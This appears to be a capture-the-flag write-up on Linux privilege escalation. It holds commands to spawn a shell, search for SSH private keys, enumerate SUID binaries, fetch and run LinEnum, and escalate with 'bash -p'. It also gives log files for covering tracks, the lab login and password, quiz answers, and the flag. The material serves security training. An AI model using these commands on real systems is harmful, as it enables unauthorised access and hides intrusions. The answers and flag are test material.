The Rogue Gnome

Networking - Priv Esc

Video

Resources

whoami name of the account

echo $0 our shell

python -c 'import pty; pty.spawn("/bin/bash")' spawn another shell and make it interactive

We're using find to search the volume, by specifying the root (/) to search for files named "id_rsa" which is the name for private SSH keys, and then using 2> /dev/null to only show matches to us.

find / -name id_rsa 2> /dev/null

The "Priv Esc Checklist"

Determining the kernel of the machine (kernel exploitation such as Dirtyc0w)
Locating other services running or applications installed that may be abusable (SUID & out of date software)
Looking for automated scripts like backup scripts (exploiting crontabs)
Credentials (user accounts, application config files..)
Mis-configured file and directory permissions

Cheatsheets

SUID 101

GTFOBins

find / -perm -u=s -type f 2>/dev/null

Enumeration Scripts

LinEnum

Transfer Scripts

python3 -m http.server 8080

nc -l -p 1337 > LinEnum.sh nc -w -3 10.10.6.64 1337 < LinEnum.sh

Covering our Tracks

"/var/log/auth.log" (Attempted logins for SSH, changes too or logging in as system users:)
"/var/log/syslog" (System events such as firewall alerts:)
"/var/log/<service/" -- /var/log/apache2/access.log"

Challenge

What type of privilege escalation involves using a user account to execute commands as an administrator?

vertical

What is the name of the file that contains a list of users who are a part of the `sudo` group?

sudoers

Use SSH to log in to the vulnerable machine like so: `ssh cmnatic@10.10.6.64`

Input the following password when prompted: aoc2020

No answer needed

Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.

You may find uploading some of the enumeration scripts that were used during today's task to be useful.

wget 10.14.4.204:8080/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

https://gtfobins.github.io/gtfobins/bash/

bash -p

No answer needed

Use this executable to launch a system shell as root.

What are the contents of the file located at /root/flag.txt?

cat /root/flag.txt

thm{2fb10afe933296592}

PreviousDon't be sElfish!NextReady, set, elf.

Last updated 4 years ago

Was this helpful?

Video

Resources

The "Priv Esc Checklist"

Cheatsheets

SUID 101

Enumeration Scripts

Transfer Scripts

Covering our Tracks

Challenge

What type of privilege escalation involves using a user account to execute commands as an administrator?

What is the name of the file that contains a list of users who are a part of the sudo group?

Use SSH to log in to the vulnerable machine like so: ssh cmnatic@10.10.6.64

Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.

What are the contents of the file located at /root/flag.txt?

What is the name of the file that contains a list of users who are a part of the `sudo` group?

Use SSH to log in to the vulnerable machine like so: `ssh cmnatic@10.10.6.64`